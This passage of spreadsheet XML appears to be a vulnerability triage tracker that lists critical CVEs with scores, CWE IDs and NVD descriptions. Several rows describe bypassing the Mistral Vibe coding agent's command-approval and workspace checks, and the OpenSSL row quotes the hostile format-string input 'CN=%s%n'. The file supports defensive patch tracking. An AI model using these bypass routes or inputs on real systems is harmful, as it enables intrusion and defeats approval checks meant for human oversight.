      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-228</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>An arbitrary code execution vulnerability in Mistral Vibe allows an attacker to bypass command permission checks using shell constructs it's parser cannot interpret. Unparsed portions are omitted from inspection, enabling embedded commands to execute on the user's system without approval.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87986</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87987</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-15</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>An arbitrary code execution vulnerability in Mistral Vibe allows an attacker to bypass command permission checks using environment variable assignments preceding allowlisted commands. These assignments are excluded from inspection, enabling attacker-controlled environment variables to cause arbitrary code execution without user approval.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87987</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87988</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file access vulnerability in Mistral Vibe allows an attacker to bypass workspace restrictions through commands classified as unconditionally allowed. Missing path validation for these commands enables access to files outside the active workspace without user approval.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87988</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19232</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>Adobe Experience Manager is affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user, potentially gaining elevated access or control over the victim's account or session. A low-privileged attacker could exploit this vulnerability to gain elevated access or control over the victim's account or session. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19232</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65646</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in in Plesk's DNS zone management functionality allows remote authenticated users to disclose arbitrary local files and escalate privileges.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65646</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66897</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr">
        <is>
          <t>canonical:lxd</t>
        </is>
      </c>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-23</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability in LXD's instance template processing allows an attacker with container edit permissions, or any user launching a crafted image, to overwrite arbitrary files on the host system as root. When processing target template paths specified in metadata.yaml, LXD validates the path against a confined os.Root directory handle but subsequently opens and creates the file using os.Create with an unconfined string path. This discrepancy between path resolution checks and file creation allows an attacker to escape directory confinement, overwrite root-owned host files, and achieve host root code execution.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66897</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14559</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>The teddy-bear-customize-addon WordPress plugin through 1.0.5 does not verify a user's password before authenticating them, allowing unauthenticated attackers to log in as any registered user, including administrators, by supplying only that user's email address.</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14559</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14563</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>The advanced-customized-prompts WordPress plugin through 1.0.1 does not verify the password before issuing an authenticated session for a supplied email address in an unauthenticated action, allowing unauthenticated attackers to log in as any registered user, including administrators, or to create arbitrary new accounts.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14563</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21095</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in DNG decoder of libimagecodec.quram.so prior to SMR Sep-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21095</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21096</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in JPEG decoder of libimagecodec.quram.so prior to SMR Sep-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21096</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52630</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>SQL Injection vulnerability in Woltlab WCF v.6.2.4 and before allows a remote attacker to updateUserOptions in UserEditor.class.php and the update action in UserAction.class.php</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52630</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53952</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-306, CWE-489</t>
        </is>
      </c>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>GetSimple CMS is a content management system (CMS), and GetSimple CMS CE is the community edition of that CMS. A logic flaw in GetSimple CMS (v3.4.0a and below) and GetSimpleCMS-CE (v3.3.22 and below) allows unauthenticated attackers to create a new administrator account. The application features an automated security control designed to delete the sensitive `admin/setup.php` file post-installation. However, this control is neutralized by a self-exclusion bug within the deletion logic, leaving the setup script accessible for unauthorized account creation even after a legitimate installation is completed. As of time of publication, no known patched versions are available.</t>
        </is>
      </c>
      <c r="S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53952</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62103</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated PHP Object Injection in Everest Forms &lt;= 3.6.0 versions.</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62103</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62105</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated PHP Object Injection in ThemeREX Addons &lt; 2.45.0 versions.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62105</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63073</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>Issue summary: OpenSSL CMP response validation passed an unexpected response
sender distinguished name directly as the format string to `ERR_raise_data()`.
Impact summary: A malicious or intercepted CMP endpoint can crash a CMP client
that enforces an expected sender or uses a pinned server certificate whose
subject becomes the default expected sender.
CWE: CWE-134 (Use of Externally-Controlled Format String)
Description: When validating a received CMP message, ossl_cmp_msg_check_update()
converts the peer-supplied sender distinguished name with X509_NAME_oneline()
and passes it directly as the format argument to ERR_raise_data(). Percent
characters survive the conversion, so a sender DN such as "CN=%s%n" reaches
BIO_vsnprintf() as an attacker-controlled format string with no matching variadic
arguments. This path is only reached when the caller configures an expected
sender or pins a server certificate, which is the normal configuration for a
CMP client validating server responses.
Since the attacker controls the format string but none of the variadic
arguments, such specifiers as %s and %n dereference or write through unrelated
stack contents and crash the client. The reliable consequence is a denial of
service, when the response comes from a malicious or intercepted CMP endpoint.
There is no controlled memory write, arbitrary-address read, or reliable path
to remote code execution.
FIPS impact: no
No FIPS modules are affected by this issue, as the CMP protocol
implementation is outside the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63073</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69431</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69431</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71644</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>An issue in Robotics-STAR-Lab (SYSU STAR Group) RACER Tested affected version: commit abcdef1234567890 allows an attacker to cause unsafe trajectory planning and potential UAV collisions via a missing default case in the FSM that stops publishing swarm trajectories when the drone enters IDLE</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71644</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77089</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
